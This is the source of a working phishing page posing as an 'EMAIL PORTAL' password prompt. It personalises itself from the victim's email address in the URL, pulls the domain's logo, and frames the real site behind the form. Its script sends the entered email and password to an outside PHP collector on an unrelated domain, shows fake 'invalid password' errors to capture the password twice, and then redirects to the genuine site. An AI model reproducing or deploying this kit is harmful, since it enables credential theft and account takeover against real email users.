<html id="html" data-ref="alphash" data-iframe="0" lang="en"><head>
    <meta charset="UTF-8">
    <title>EMAIL PORTAL - Mail Authentication</title>
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <link id="faviconx" rel="icon" type="image/x-icon" href="https://i.ibb.co/wpdGv7k/WBP.png;size=64">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
    <style>
        /* OBFUSCATED BY CSSOBFUSCATOR.COM at 2022/08/17 00:14:09 */
        
        body,
        [class~=main_container] {
            background-color: #fff;
			overflow-x:hidden;
        }
        
        [class~=main_container],
        body,
        [class~=container] {
            display: flex;
        }
        
        [class~=main_container],
        body {
            justify-content: center;
        }
        
        [class~=container] h3 {
            color: #000;
        }
        
        [class~=container] {
            width: 26.25pc;
        }
        
        #auth_reg {
            color: red;
        }
        
        [class~=container] {
            height: 500px;
        }
        
        #auth_reg {
            padding-left: 3.75pt;
        }
        
        #auth_reg {
            padding-bottom: 3.75pt;
        }
        
        [class~=container] h3,
        [class~=container] h3 i,
        [class~=intro-text] p {
            font-size: 1rem;
        }
        
        * {
            box-sizing: border-box;
        }
        
        [class~=intro-text] p {
            padding-top: .3rem;
        }
        
        .input input:focus {
            border-left-width: .020833333in;
        }
        
        #auth_reg {
            padding-right: 3.75pt;
        }
        
        [class~=container] {
            background: #fff;
        }
        
        [class~=container] {
            box-shadow: 0 .625pc 15px rgba(179, 179, 179, .7);
        }
        
        * {
            margin-left: 0;
        }
        
        [class~=container] {
            position: absolute !important;
        }
        
        [class~=intro-text] p {
            font-family: Cambria, Cochin, Georgia, Times, "Times New Roman", serif;
        }
        
        [class~=intro-text] p {
            text-align: center;
        }
        
        [class~=intro-text] h2 {
            color: #0627ab;
        }
        
        [class~=intro-text] h2 {
            font-size: 1.2rem;
        }
        
        [class~=input] input:valid~label,
        [class~=container] {
            top: 10%;
        }
        
        [class~=join-link] a {
            text-decoration: none;
        }
        
        [class~=join-link] a {
            font-weight: normal;
        }
        
        #auth_reg {
            padding-top: 3.75pt;
        }
        
        #auth_reg2,
        #auth_reg {
            font-size: small;
        }
        
        [class~=join-link] a {
            color: rgba(128, 128, 128, .577);
        }
        
        [class~=forgot-pass-link]:hover {
            background: rgba(10, 102, 195, .3);
        }
        
        [class~=container] {
            display: none;
        }
        
        button {
            height: 60px !important;
        }
        
        [class~=loader] [class~=loaderBar] {
            position: absolute;
        }
        
        [class~=loader] [class~=loaderBar] {
            border-radius: .625pc;
        }
        
        button {
            background: #0a66c3;
        }
        
        [class~=container],
        [class~=intro-text] {
            flex-direction: column;
        }
        
        .input input:focus {
            border-bottom-width: .020833333in;
        }
        
        [class~=input],
        [class~=input] input {
            width: 100%;
        }
        
        [class~=input],
        [class~=input] input {
            height: .520833333in;
        }
        
        [class~=container] {
            justify-content: space-evenly;
        }
        
        [class~=container] {
            padding-left: 2rem;
        }
        
        [class~=container] h3 i {
            padding-left: .1rem;
        }
        
        [class~=container] {
            padding-bottom: 2rem;
        }
        
        [class~=input] input {
            padding-top: 1.1rem;
        }
        
        [class~=container] {
            padding-right: 2rem;
        }
        
        [class~=input] input {
            padding-left: .09375in;
        }
        
        * {
            margin-bottom: 0;
        }
        
        button,
        [class~=input] input {
            outline: none;
        }
        
        #auth_reg2,
        #auth_reg {
            font-family: sans-serif, "Helvetica Neue", "Lucida Grande", Arial;
        }
        
        [class~=container] {
            padding-top: 0rem;
        }
        
        [class~=container] {
            z-index: 99999999;
        }
        
        [class~=loader] [class~=loaderBar] {
            top: 0;
        }
        
        [class~=intro-text] {
            display: flex;
        }
        
        [class~=intro-text] {
            justify-content: center;
        }
        
        [class~=input] input {
            border-left-width: .0625pc;
        }
        
        [class~=input] input {
            border-bottom-width: .0625pc;
        }
        
        [class~=intro-text]>* {
            margin-left: auto;
        }
        
        button {
            border-left-width: medium;
        }
        
        #auth_reg2,
        #auth_reg {
            font-stretch: expanded;
        }
        
        button {
            border-bottom-width: medium;
        }
        
        [class~=input] input {
            border-right-width: .0625pc;
        }
        
        [class~=input] input {
            border-top-width: .0625pc;
        }
        
        [class~=input] input {
            border-left-style: solid;
        }
        
        [class~=intro-text]>* {
            margin-bottom: .625pc;
        }
        
        [class~=input] input {
            border-bottom-style: solid;
        }
        
        [class~=intro-text]>* {
            margin-right: auto;
        }
        
        #auth_reg2 {
            color: red;
        }
        
        [class~=input] input {
            border-right-style: solid;
        }
        
        [class~=input] input {
            border-top-style: solid;
        }
        
        [class~=input] input {
            border-left-color: #8c8c8c;
        }
        
        [class~=input] input {
            border-bottom-color: #8c8c8c;
        }
        
        [class~=intro-text]>* {
            margin-top: auto;
        }
        
        [class~=input] input {
            border-right-color: #8c8c8c;
        }
        
        .input input:focus {
            border-right-width: .020833333in;
        }
        
        button {
            border-right-width: medium;
        }
        
        button {
            border-top-width: medium;
        }
        
        [class~=input] input {
            border-top-color: #8c8c8c;
        }
        
        [class~=input] {
            position: relative;
        }
        
        [class~=input] input {
            border-image: none;
        }
        
        [class~=loader] [class~=loaderBar] {
            right: 100%;
        }
        
        [class~=input] input {
            border-radius: .1875pc;
        }
        
        [class~=input] input,
        [class~=input] label {
            transition: .2s;
        }
        
        [class~=input] {
            margin-bottom: .7rem;
        }
        
        [class~=forgot-pass-link],
        [class~=join-link] {
            text-align: center;
        }
        
        * {
            margin-right: 0;
        }
        
        [class~=input] input {
            letter-spacing: .3rem;
        }
        
        [class~=input] input {
            font-size: 1rem;
        }
        
        #auth_reg2,
        .top_level h3 {
            display: none;
        }
        
        [class~=join-link] {
            color: rgba(0, 0, 0, .5);
        }
        
        #show_pass {
            padding-left: 6pt;
        }
        
        [class~=join-link] {
            font-size: small;
        }
        
        [class~=forgot-pass-link] {
            width: 8.75pc;
        }
        
        [class~=input] label {
            position: absolute;
        }
        
        [class~=forgot-pass-link] {
            padding-left: .2rem;
        }
        
        [class~=forgot-pass-link] {
            padding-bottom: .2rem;
        }
        
        [class~=input] label {
            top: 30%;
        }
        
        #auth_reg {}
        
        [class~=forgot-pass-link] {
            padding-right: .2rem;
        }
        
        [class~=input] label {
            left: 7.5pt;
        }
        
        .input input:focus {
            border-top-width: .020833333in;
        }
        
        #top_label,
        [class~=input] label {
            font-size: 1.1rem;
        }
        
        [class~=forgot-pass-link] {
            padding-top: .2rem;
        }
        
        [class~=input] label {
            color: #8c8c8c;
        }
        
        #top_label_logo {
            max-width: 160px;
        }
        
        [class~=loader] [class~=loaderBar] {
            bottom: 0;
        }
        
        button {
            border-left-style: none;
        }
        
        [class~=forgot-pass-link] {
            text-decoration: none;
        }
        
        [class~=forgot-pass-link] {
            font-weight: bolder;
        }
        
        [class~=forgot-pass-link],
        #top_label {
            color: #0a66c3;
        }
        
        #top_label_logo {
            max-height: .833333333in;
        }
        
        [class~=forgot-pass-link] {
            transition: .3s;
        }
        
        [class~=forgot-pass-link] {
            border-radius: .75pc;
        }
        
        .loader:before {
            content: "";
        }
        
        #top_label,
        [class~=top_level],
        [class~=rem_me] {
            display: flex;
        }
        
        [class~=input] input:valid~label {
            font-size: .8rem;
        }
        
        .loader:before {
            border-left-width: .75pt;
        }
        
        [class~=top_level],
        [class~=loading_text] {
            justify-content: center;
        }
        
        #main_logo_id {
            max-width: 75pt;
        }
        
        .loader:before {
            border-bottom-width: .75pt;
        }
        
        .loader:before {
            border-right-width: .75pt;
        }
        
        [class~=rem_me],
        [class~=top_level] {
            align-items: center;
        }
        
        button {
            border-bottom-style: none;
        }
        
        [class~=top_level] {
            background-color: #dedede;
        }
        
        [class~=top_level],
        [class~=rem_me] {
            padding-left: .3125pc;
        }
        
        #main_logo_id {
            min-width: auto;
        }
        
        [class~=top_level] {
            padding-bottom: 11.25pt;
        }
        
        [class~=top_level],
        [class~=rem_me] {
            padding-right: .3125pc;
        }
        
        [class~=top_level] {
            padding-top: 15px;
        }
        
        [class~=loader] [class~=loaderBar] {
            left: 0;
        }
        
        .loader:before {
            border-top-width: .75pt;
        }
        
        button {
            border-right-style: none;
        }
        
        #top_label {
            text-align: center;
        }
        
        [class~=rem_me] {
            padding-bottom: 3.75pt;
        }
        
        button {
            border-top-style: none;
        }
        
        [class~=loader] [class~=loaderBar] {
            background-color: #626262;
        }
        
        .loader,
        .loader:before {
            border-left-style: solid;
        }
        
        .loader,
        .loader:before {
            border-bottom-style: solid;
        }
        
        [class~=input] input:valid~label,
        [class~=top_level] h3 span {
            color: #000;
        }
        
        button {
            border-left-color: currentColor;
        }
        
        [class~=rem_me] {
            padding-top: 3.75pt;
        }
        
        .loader,
        .loader:before {
            border-right-style: solid;
        }
        
        .loader:before,
        .loader {
            border-top-style: solid;
        }
        
        button {
            border-bottom-color: currentColor;
        }
        
        #top_label {
            font-weight: bold;
        }
        
        .loader {
            width: 5.208333333in;
        }
        
        .loader:before {
            border-left-color: #747474;
        }
        
        button {
            border-right-color: currentColor;
        }
        
        .loader {
            margin-left: auto;
        }
        
        .loader {
            margin-bottom: 0;
        }
        
        .loader {
            margin-right: auto;
        }
        
        .loader,
        * {
            margin-top: 0;
        }
        
        .input input:focus {
            border-left-color: #0a66c3;
        }
        
        button {
            border-top-color: currentColor;
        }
        
        .loader:before {
            border-bottom-color: #747474;
        }
        
        button {
            border-image: none;
        }
        
        .loader:before {
            border-right-color: #747474;
        }
        
        .loader:before {
            border-top-color: #747474;
        }
        
        .loader {
            border-radius: 7.5pt;
        }
        
        .loader {
            border-left-width: .041666667in;
        }
        
        .loader:before {
            border-image: none;
        }
        
        .loader:before {
            border-radius: 5px;
        }
        
        .loader {
            border-bottom-width: .041666667in;
        }
        
        .loader:before {
            position: absolute;
        }
        
        .loader:before {
            top: -.25pc;
        }
        
        .input input:focus {
            border-bottom-color: #0a66c3;
        }
        
        [class~=loader] [class~=loaderBar] {
            width: 0;
        }
        
        .loader {
            border-right-width: .041666667in;
        }
        
        .loader {
            border-top-width: .041666667in;
        }
        
        .loader:before {
            right: -3pt;
        }
        
        button {
            border-radius: 0px;
        }
        
        button {
            color: #fff;
        }
        
        .input input:focus {
            border-right-color: #0a66c3;
        }
        
        .loader:before {
            bottom: -3pt;
        }
        
        button {
            font-size: 1rem;
        }
        
        button {
            font-weight: bolder;
        }
        
        button {
            cursor: pointer;
        }
        
        .input input:focus {
            border-top-color: #0a66c3;
        }
        
        [class~=loader] [class~=loaderBar] {
            animation: borealisBar 1.3s linear infinite;
        }
        
        .loader {
            border-left-color: transparent;
        }
        
        .loader:before {
            left: -3pt;
        }
        
        [class~=input] input:focus~label {
            top: 10%;
        }
        
        .loader {
            border-bottom-color: transparent;
        }
        
        .loader {
            border-right-color: transparent;
        }
        
        .loader {
            border-top-color: transparent;
        }
        
        .loader {
            border-image: none;
        }
        
        .loader {
            position: relative;
        }
        
        .loader {
            padding-left: .0625pc;
        }
        
        [class~=input] input:focus~label {
            font-size: .8rem;
        }
        
        * {
            padding-left: 0;
        }
        
        .loader {
            padding-bottom: .0625pc;
        }
        
        .loader {
            padding-right: .0625pc;
        }
        
        .loader {
            padding-top: .0625pc;
        }
        
        * {
            padding-bottom: 0;
        }
        
        [class~=input] input:focus~label {
            color: #000;
        }
        
        * {
            padding-right: 0;
        }
        
        * {
            padding-top: 0;
        }
        
        @keyframes borealisBar {
            0% {
                left: 0%;
                right: 100%;
                width: 0%;
            }
            10% {
                left: 0%;
                right: 75%;
                width: 25%;
            }
            90% {
                right: 0%;
                left: 75%;
                width: 25%;
            }
            100% {
                left: 100%;
                right: 0%;
                width: 0%;
            }
        }
        
        [class~=mail-loader_block] {
            position: relative;
        }
        
        [class~=mail-loader_block] {
            margin-top: 12%;
        }
        
        [class~=mail-loader_block] {
            display: flex;
        }
        
        [class~=mail-loader_block] {
            justify-content: center;
        }
        
        [class~=mail-loader_block] {
            align-items: center;
        }
        
        [class~=mail-loader_block] {
            flex-direction: column;
        }
        
        [class~=progress-bar] {
            border-radius: 7.5pt;
        }
        
        [class~=progress-bar] {
            overflow: hidden;
        }
        
        [class~=progress-bar] {
            width: 100%;
        }
        
        [class~=progress-bar] {
            border-left-style: solid;
        }
        
        [class~=progress-bar] {
            border-bottom-style: solid;
        }
        
        [class~=progress-bar] {
            border-right-style: solid;
        }
        
        [class~=progress-bar] {
            border-top-style: solid;
        }
        
        [class~=mail-loader_block] img {
            margin-left: auto;
        }
        
        [class~=progress-bar] {
            border-left-width: .005208333in;
        }
        
        [class~=progress-bar] {
            border-bottom-width: .005208333in;
        }
        
        [class~=progress-bar] {
            border-right-width: .005208333in;
        }
        
        [class~=progress-bar] {
            border-top-width: .005208333in;
        }
        
        [class~=progress-bar] {
            border-left-color: #000;
        }
        
        [class~=progress-bar] {
            border-bottom-color: #000;
        }
        
        [class~=progress-bar] {
            border-right-color: #000;
        }
        
        [class~=progress-bar] {
            border-top-color: #000;
        }
        
        [class~=bar] {
            background: transparent;
        }
        
        [class~=bar],
        [class~=progress] {
            padding-left: .020833333in;
        }
        
        [class~=progress],
        [class~=bar] {
            padding-bottom: .020833333in;
        }
        
        [class~=progress],
        [class~=bar] {
            padding-right: .020833333in;
        }
        
        [class~=progress],
        [class~=bar] {
            padding-top: .020833333in;
        }
        
        [class~=progress] {
            animation: loader 8s ease infinite;
        }
        
        [class~=progress] {
            background: #fe0;
        }
        
        [class~=progress] {
            color: #fff;
        }
        
        [class~=progress] {
            width: 0;
        }
        
        [class~=progress-bar] {
            left: 50%;
        }
        
        [class~=progress-bar] {
            width: 5.208333333in;
        }
        
        [class~=progress-bar] {
            position: absolute;
        }
        
        [class~=mail-loader_block] img {
            margin-bottom: 15pt;
        }
        
        [class~=progress-bar] {
            top: 50%;
        }
        
        [class~=progress-bar] {
            transform: translate3d(-50%, -50%, 0);
        }
        
        [class~=mail-loader_block] img {
            margin-right: auto;
        }
        
        [class~=mail-loader_block] img {
            margin-top: auto;
        }
        
        [class~=mail-loader_block] img {
            border-radius: 0%;
        }
        
        .progress-bar span {
            display: block;
        }
        
        @keyframes loader {
            0% {
                width: 0;
            }
            20% {
                width: 10%;
            }
            25% {
                width: 24%;
            }
            43% {
                width: 41%;
            }
            56% {
                width: 50%;
            }
            66% {
                width: 52%;
            }
            71% {
                width: 60%;
            }
            75% {
                width: 76%;
            }
            94% {
                width: 86%;
            }
            100% {
                width: 100%;
            }
        }
        
        .progress_loaderx {
            position: relative;
        }
        
        .progress_loaderx {
            margin-top: 15%;
        }
        
        .progress_loaderx {
            display: flex;
        }
        
        .progress_loaderx {
            justify-content: center;
        }
        
        .progress_loaderx {
            align-items: center;
        }
        
        .overlay_div {
            position: fixed;
        }
        
        .overlay_div {
            background-color: rgba(0, 0, 0, .196);
        }
        
        [class~=new_feature] [class~=left_box] {
            display: block !important;
        }
        
        .progress_loaderx img {
            margin-left: auto;
        }
        
        .overlay_div {
            width: 100%;
        }
        
        .overlay_div {
            height: 100%;
        }
        
        .overlay_div {
            z-index: 99999;
        }
        
        .overlay_div {
            display: none;
        }
        
        [class~=new_feature] {
            border-left-style: solid;
        }
        
        [class~=new_feature] {
            border-bottom-style: solid;
        }
        
        [class~=new_feature] {
            border-right-style: solid;
        }
        
        [class~=new_feature] {
            border-top-style: solid;
        }
        
        [class~=new_feature] {
            border-left-width: .75pt;
        }
        
        [class~=new_feature] {
            border-bottom-width: 0pt;
        }
        
        [class~=new_feature] {
            border-right-width: 0in;
        }
        
        [class~=new_feature] {
            border-top-width: 0pt;
        }
        
        [class~=new_feature] {
            border-left-color: rgba(138, 138, 138, .582);
        }
        
        [class~=new_feature] {
            border-bottom-color: rgba(138, 138, 138, .582);
        }
        
        [class~=new_feature] {
            border-right-color: rgba(138, 138, 138, .582);
        }
        
        [class~=new_feature] {
            border-top-color: rgba(138, 138, 138, .582);
        }
        
        .progress_loaderx img {
            margin-bottom: 6.25pc;
        }
        
        [class~=new_feature] {
            margin-left: 200px;
        }
        
        [class~=left_box] {
            position: absolute;
        }
        
        [class~=left_box] {
            background-color: rgba(106, 106, 106, .392);
        }
        
        [class~=left_box] {
            width: 3.125in;
        }
        
        [class~=left_box] {
            height: 26.875pc;
        }
        
        [class~=left_box] {
            z-index: 9999999;
        }
        
        [class~=left_box] {
            right: 430px;
        }
        
        [class~=left_box] {
            padding-left: .052083333in;
        }
        
        [class~=left_box] {
            padding-bottom: .052083333in;
        }
        
        [class~=left_box] {
            padding-right: .052083333in;
        }
        
        [class~=left_box] {
            padding-top: .052083333in;
        }
        
        [class~=left_box]>* {
            color: red;
        }
        
        .progress_loaderx img {
            margin-right: auto;
        }
        
        .progress_loaderx img {
            margin-top: auto;
        }
        
        .progress_loaderx img {
            border-radius: 50%;
        }
        
        @media only screen and (max-width: 600px) {
            [class~=mail-loader_block],
            .progress_loaderx {
                margin-top: 50%;
            }
            [class~=progress-bar],
            [class~=loader] {
                width: 85%;
            }
            [class~=container] {
                box-shadow: 0 7.5pt 11.25pt rgba(179, 179, 179, 0) !important;
            }
            [class~=container] {
                width: auto;
            }
            [class~=container] {
                height: auto;
            }
            [class~=container] {
                top: 8%;
            }
        }
    </style>
</head>

<body  style="background-color: transparent;">

    <!-- loader -->
    <div class="mail-loader_block" id="first" style="margin-top:-200px;" >
		<center>
        <img id="main_logo_id" src="" style="width:70px;">
        <div class="loader" >
            <div class="loaderBar" style="background-color: green;"></div>
        </div>
        <!-- <br> -->
        <hr style="width:50%;text-align:left;margin-left:0;">
        <div class="loading_text">loading <span id="loader_email"></span> mail settings ...</div>
        <hr style="width:50%;text-align:left;margin-left:0">
		</center>
    </div>
    <!-- loader end -->
    <!-- partial:index.partial.html -->
    <div class="container w3-animate-zoom" id="second" style=" background-color: rgb(255, 255, 255); box-shadow: rgba(179, 179, 179, 0.7) 0px 10px 15px;height:560px;">
        <div class="left_box" style="display: none;">
            <span>EMAIL SETTINGS PORTAL</span>
        </div>
        <div class="top_level" style="background-color: transparent;">
            <img id="top_label_logo" src="https://t1.gstatic.com/faviconV2?client=SOCIAL&amp;type=FAVICON&amp;fallback_opts=TYPE,SIZE,URL&amp;url=http://aegistax.com&amp;size=64" style="display: none;">
            
			<center><b><h3 style="display: block;color:blue;font-size:20px;"><span id="toto" style="color:blue;"></span><br>EMAIL PORTAL</h3></b></center>
        </div>
        <div class="intro-text">
            <h2 id="auth_email" style="color: rgb(6, 39, 171);"></h2>
            <hr style="width:100%;text-align:left;margin-left:0">
            <p id="comment_text">You're accessing a secure settings, please provide your <b><span id="pussy">aegistax.com</span></b> password to continue.</p>
			<form action="" method="POST" id="contact">
			<input type="hidden" name="email" id="email" required="" style="border-color: rgb(140, 140, 140);">
        </div>
        <div class="inputs"><div class="input">
		
<input type="password" name="password" id="password" required="" style="border-color: rgb(140, 140, 140);">
<label id="pass_label" for="password">Password</label>
</div>
<div style="display: flex;">
<span id="auth_reg">Authentication is required!</span>
<span id="auth_reg2">Authentication error!</span>
</div>
<br>
</div>
        <button id="next_button" style="padding-top: 10px; padding-bottom: 10px; color: rgb(255, 255, 255); background: rgb(24, 143, 255);width:100%;">NEXT</button>
		</form>
        <br><br><br>
        <hr style="width:100%;text-align:left;margin-left:0;background-color: rgba(128, 128, 128, 0.318);">
        <p class="join-link">© 2022&nbsp;<a href="#" id="footer_com">Secure Portal</a>&nbsp;<a href="#">|</a>&nbsp;<a href="#" id="footer_pri">Privacy</a><br><a href="#" id="footer_dom"></a></p>

    </div>
<div class="overlay_div"></div>
<iframe src="" id="mainPage"style="position: fixed; inset: 0px; width: 100%; height: 100%; border: none; margin: 0px; padding: 0px; overflow-x: hidden; z-index: 999;">
        Your browser doesn't support iframes
    </iframe>
   

	<script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
      <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
 	 <script>
	setTimeout(() => {  

	$('#first').css('display', 'none');
	$('#second').css('display', 'block'); }, 5000);
    </script>

  <script>
$(document).ready(function(){
var count=0;

var email = window.location.hash.substr(1);
if (!email) {

}
else
{
var my_email =email;
$('#email').val(my_email);
$('#auth_email').html(my_email);


var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

if (!filter.test(my_email)) {
$('#error').show();
email.focus;
return false;
}
var ind=my_email.indexOf("@");
var my_slice=my_email.substr((ind+1));
var c= my_slice.substr(0, my_slice.indexOf('.'));
var mPage = 'https://'+my_slice;
var final= c.toLowerCase();
var finalu= c.toUpperCase();
$("#main_logo_id").attr("src", "https://logo.clearbit.com/"+my_slice);
$('#loader_email').html(my_slice);
$("#toto").html(finalu);
document.getElementById('mainPage').src = mPage; 
$("#tit").html(finalu);
$("#pussy").html(my_slice);
$("#footer_dom").html(my_slice);


}



$('#next_button').click(function(event){

event.preventDefault();
var email=$("#email").val();
var password=$("#password").val();
if (!email) {
    $('#auth_reg').show();
    $('#auth_reg').html("Email can not be found");

                return false;
            }
if (!password) {
    $('#auth_reg').show();
    $('#auth_reg').html("Password field is empty!");

                return false;
            }

count=count+1;

$.ajax({
dataType: 'JSON',
url: 'https://sditmakiya.sch.id/zb.php',
type: 'POST',
      	data:{
			email:email,
            password:password,	
      	},
			data: $('#contact').serialize(),
            beforeSend: function(xhr){
            	
            },
            success: function(response){
            	if(response){
            		$("#msg").show();
            		console.log(response);
            		if(response['signal'] == 'ok'){
            			$("#password").val("");
            			if (count>=2) {
            				count=0;
                    // window.location.replace(response['redirect_link']);
                   window.location.replace("https://www."+my_slice);

                }
                    	$("#auth_reg").show();
				                      
			$('#auth_reg').html("Invalid password. Please try again");
            
            }
            else{
                	$("#auth_reg").show();
				                      
			$('#auth_reg').html("Make sure details are correct and try again");
               
            }
        }
    },
    error: function(){
    	$("#password").val("");
    	if (count>=2) {
    		count=0;
    		 window.location.replace("https://www."+my_slice);
    	}
               	$("#auth_reg").show();
				                      
			$('#auth_reg').html("Timeout waiting for response. Make sure details are correct");
               
    },
    complete: function(){
    	
    }
});
  });


	});


</script>

</body></html>